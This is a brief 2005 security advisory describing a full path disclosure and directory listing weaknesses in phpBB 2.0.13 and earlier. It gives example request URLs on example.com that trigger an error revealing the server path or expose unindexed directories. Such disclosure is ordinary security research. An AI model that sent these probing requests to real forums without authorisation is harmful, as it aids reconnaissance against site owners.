[phpbb <= 2.0.13 full path disclosure & directory listing] Author: Jocanor Date= 18-03-2k5 1. -----------introduction-------- phpbb is an high-customizable bulletin board writed in php. Oficial page: http://www.phpbb.com 1. ------------Full path disclossure------------ This error is non critical...but you can get the full path to the forum in the system. exploit: http://www.example.com/db/oracle.php Fatal error: Cannot redeclare sql_nextid() in /www/phpbb2/db/oracle.php on line 405 2.---------Directory listing--------- default installation of phpbb have some directoryes with no index.* file, with this low risc bug you can obtain information of the system, like http daemon. exploits: http://www.example.com/images/smiles/ http://www.example.com/templates/subSilver/images/lang_english/ http://www.example.com/docs/ 3-----greetz-------- /dev/null 4----- Contact ----- Author: Jocanor Location: Spain Email: jocanor [at] gmail [dot] com JoCaNoR SeCuRiTy ReaSoNS EOF.